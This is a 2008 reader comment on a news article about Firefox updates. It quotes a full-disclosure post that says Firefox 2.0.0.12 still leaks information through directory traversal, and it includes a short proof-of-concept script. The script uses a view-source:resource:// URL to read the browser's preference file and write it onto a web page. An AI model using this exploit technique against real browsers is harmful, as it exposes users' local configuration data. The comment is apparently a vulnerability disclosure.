Post: Firefox 2.0.0.12 is still vulnerable to directory trasversal flaw!
Firefox 2.0.0.12 is still vulnerable to directory trasversal flaw! →
Posted Saturday 9th February 2008 23:58 GMT
In Firefox updates, blitzes trio of critical bugs
Firefox 2.0.0.12 is still vulnerable to directory trasversal:
"don't patch vulnerabilities
for fifty percent, take the time and fix the cause. Because directory
traversal through plugins is all nice and such, we don't need it. We
can trick Firefox itself in traversing directories back. I found
another information leak that is very serious because we are able to
read out all preferences set in Firefox, or just open or include about
every file stored in the Mozilla program files directory, and this
without any mandatory settings or plugins."
http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060156.html
/*
@name: Firefox <= 2.0.0.12 information leak pOc
@date: Feb. 07 2008
@author: Ronald van den Heetkamp
@url: http://www.0x000000.com
*/
pref = function(a,b) {
document.write( a + ' -> ' + b + '<br />');
};
</script>
<script src="view-source:resource:///greprefs/all.js">
</script>
Most read
Popular Whitepapers
- Staying committed to server refresh reduces cost
Can a server refresh help your company? - Business Ready Configurations for Virtualization
A Solution Guide - A Smart Path to Virtualization
Virtualization and Flexible Computing - Optimizing the data center for cost and efficiency
Control costs and add value to the business - Real-world server consolidation with Hyper-V
35 HP ProLiant DL385 servers onto 5 Dell PowerEdge M610 blade servers running Hyper-V - Thermal design of Dell PowerEdge server
T610, R610 and R710
